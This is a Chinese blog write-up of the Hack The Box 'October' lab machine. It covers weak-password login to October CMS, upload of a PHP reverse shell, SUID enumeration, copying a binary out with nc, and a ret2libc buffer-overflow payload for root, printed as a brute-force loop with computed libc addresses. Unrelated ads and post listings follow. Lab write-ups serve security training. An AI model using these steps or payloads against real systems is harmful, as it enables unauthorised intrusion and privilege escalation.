Hack The Box 之 October靶机

已于 2024-01-19 18:06:44 修改
阅读量77 收藏
点赞数
文章标签: android
于 2023-08-15 20:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Karka_/article/details/132290104
版权

October介绍

image

nmap 扫描

image发现开放80和22端口,发现网站的框架为October
CMS.

反弹shell

作为PHP开源CMS平台,october是一个免费,开源,自托管的CMS平台,基于Laravel PHP框架开发。它构建现代网站的一种高效工具 ,基于灵活的模式。特性:1、页面组件 2、可扩展的平台 3、简单的 AJAX 框架 4、易管理的界面 5、完全基于文件的CMS模板

其默认的登录页面为backend目录,或者可以直接用dirbuster扫描出后台登录url,直接用admin/admin弱密码登录,成功登录。

image

尝试上传后缀名为php的文件,失败,然后看见目录下全部都是后缀名为php5,然后上传后缀名为php5的文件,成功。
可以直接上传反弹[php马](https://pentestmonkey.net/tools/web-shells/php-reverse-
shell),修改下端口和地址。

image

成功反弹shell
image

python -c 'import pty; pty.spawn("/bin/bash")' ##转化为标准的交互模式

提权

SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

find -perm -4000 2>/dev/null ##搜索尝试查找具有root权限的SUID的文件
image

用nc 传到本地来进行调试。

nc -w 5 10.10.14.3 8003 < ovrflw
nc -l -p 8003 > ovrflw

用IDA打开,F5反汇编,发现存在strncpy的缓冲区溢出。
image用gdb+peda调试栈溢出的偏移,可以直接用peda中pattern生成填充的字符串来打印出偏移的大小。
image

ldd /usr/local/bin/ovrflw ##发现libc的地址以及位置
image

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
imageimage

libcstart = 0xb755b000
libcsystem_off = 0x00040310
libcexit_off = 0x00033260
system = libcstart + libcsystem_off=0xb759b310
exit = libcstart + libcexit_off=0xb758e260
sh_offset = 0x162bac
sh = libcstart + sh_offset=0xb76bdbac

payload: 偏移+system+exit+sh

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xb3\x59\xb7\x60\xe2\x58\xb7\xac\xdb\x6b\xb7"'); done
image

其中刚刚开始是以内核版本为突破口,检查发现靶机内核版本过低,有相关的CVE可以提权。
image
谷歌搜索发现CVE-2017-16995符合要求
image但是nc反弹的shell权限过低,无法完成CVE提权。
image

总结

October靶机在hack the box中属于难度中等的靶机,其渗透过程涉及的知识点属于比较常见的类型,但是在最后一步提权的步骤中,涉及到CTF中pwn的栈溢出知识点,相较于之前的提权方法来说,可以说新颖很多,没有依赖现成的工具,对于之后的安全学习之路上,需要兼顾二进制和web,争取做一个全栈的小白。

n的栈溢出知识点,相较于之前的提权方法来说,可以说新颖很多,没有依赖现成的工具,对于之后的安全学习之路上,需要兼顾二进制和web,争取做一个全栈的小白。

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tsqnyp3K-1692062759904)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]

程序员桔子
关注
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
Android Camera 预览角度和拍照保存图片角度相关
sinat_37429535的博客
09-23 1150
基于Android R(11)
深入Android UI开发:从自定义View到高级布局技巧的全面学习资料
无尽的大道的专栏
09-20 824
什么是自定义View:了解自定义View的基本概念和重要性,为深入学习打下基础。高级UI技巧:探索高级UI设计的技巧,提升应用的视觉效果。UI总结:总结UI开发的关键点和最佳实践,为未来的项目开发提供指导。
MYSQL SWAP 内存 vm.swappiness
jnrjian的博客
09-20 967
关于 vm.swappiness 的困惑来自于这样一个事实:在较旧的 Red Hat 内核中,vm.swappiness 的值为 0 会导致最少量的交换以避免内存不足的情况。在较新的内核中(从 RHEL 内核 2.6.32-303 开始​​),值为 0 将完全禁用交换,但值为 1 将提供最少量的交换以避免内存不足的情况。在较旧的内核中,0 和 1 之间的实际差异并不大,但 1 是避免较新内核中出现 OOM 情况的安全设置(当然,假设有一些交换空间可用)。考虑到系统自动将未使用的页面交换到磁盘。
安卓数据存储——SharedPreferences
大风起兮云飞扬
09-21 508
1、sharedPreferences是Android的一个轻量级存储工具,采用的存储结构是key - value的键值对方式2、共享参数的存储介质是符合XML规范的配置文件。保存路径是:/data/data/应用包名/shared_prefs/文件名.xml。
使用Charles抓包Android App数据
CYRUS STUDIO
09-23 607
分别点击 Web Proxy、Seure Web Proxy 和 SOCKS Proxy 设置一下Clash的地址和端口。把证书 push 到 /system/etc/security/cacerts(系统证书目录)比如这里得到的hash值为e4473cf9,把证书的文件名改为 e4473cf9.0。通过 ipconfg 或者打开【网络和Internet】找到电脑的 ip 地址。手机设置中打开【信任的凭据】【系统】可以看到已经有charles的证书了。电脑开启共享热点,手机连接热点并设置代理。
android system_server进程
轻口味的专栏
09-23 926
system_server进程是系统进程,java framework框架的核心载体,里面运行了大量的系统服务,比如这里提供ApplicationThreadProxy(简称ATP),ActivityManagerService(简称AMS),这个两个服务都运行在system_server进程的不同线程中,由于ATP和AMS都是基于IBinder接口,都是binder线程,binder线程的创建与销毁都是由binder驱动来决定的。系统为什么不允许在子线程中访问UI?
Android OpenGLES2.0开发(一):艰难的开始
xiaozhiwz的专栏
09-23 847
本章节我们简单讲解了OpenGL ES是什么,刨除了很多晦涩难懂的概念。
Android Retrofit源码分析(一):Retrofit是什么?和OkHttp的区别是什么?为什么需要他?
qq_40853919的博客
09-20 1077
为什么会出现Retrofit?它的作用是什么?
高通 -Android12 打开su
韩家老大的博客
09-21 475
高通 Android12
安卓学习资源推荐
qq_43664361的博客
09-22 1053
对于Android对于Android开发的学习资源,开发的学习资源,我可以推荐以下几类资源,这些我可以推荐以下几类资源,这些资源涵盖了从基础知识到高级技能的各个方面,适合不同学习阶段的开发者。资源涵盖了从基础知识到高级技能的各个方面,适合不同学习阶段的开发者。
Android】BottomSheet基本用法总结(BottomSheetDialog,BottomSheetDialogFragment)
Patrick_yuxuan的博客
09-22 1190
是一种位于屏幕底部的面板,用于显示附加内容或选项。提供了从屏幕底部向上滑动显示内容的交互方式。这种设计模式在 Material Design 中被广泛推荐,因为它可以提供一种优雅且不干扰主屏幕内容的方式来展示额外信息或操作。具体实现主要包含:BottomSheetBeahvior 、BottomSheetDialog、BottomSheetDialogFragment。
中序遍历二叉树全过程图解
YouMing_Li的博客
09-21 1649
再次回顾一下代码从我们的遍历全流程图解来看,不难理解,每个节点都是将其左子树全部递归遍历完后,才开始遍历其右子树的,如根节点A,是将其左子树BDE全部遍历完后,才开始遍历右子树的,注意思考递归栈哦,这样才能真正的理解。中序遍历理解后,前序和后续遍历是一样的道理。这时一起看下后续遍历很多同学看到递归左右子树的那两行代码,很容易陷入误区,以为那两行是"同时"在执行,认为遍历完root的左节点后,立马遍历了其右节点,这种理解是非常不对的,实际是遍历完整个左子树后,经过归回到当前层,此时才会开始执行当前层的。
Android webview拦截H5的接口请求并返回处理好的数据
最新发布
QG
09-24 953
Android webview拦截H5的接口请求并返回处理好的数据
Android SharedPreference详解
轻口味的专栏
09-22 1128
SharedPreferences作为一种数据持久化的方式,是处理简单的key-value类型数据时的首选。
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用gobuster工具等操作。此外,引用\[2\]提到了一种利用fail2ban进行提权的方法,可以通过该链接了解更多细节。引用\[3\]中提到了读取/etc/passwd文件和尝试读取/home/michael/user.txt文件的尝试。请注意,这些信息仅供参考,具体的操作和步骤可能需要进一步的研究和实践。 #### 引用[.reference_title] - *1* [Hackthebox Three](https://blog.csdn.net/lixiangshidie/article/details/128482447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Hackthebox Trikc攻略](https://blog.csdn.net/qq_44641654/article/details/127249782)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值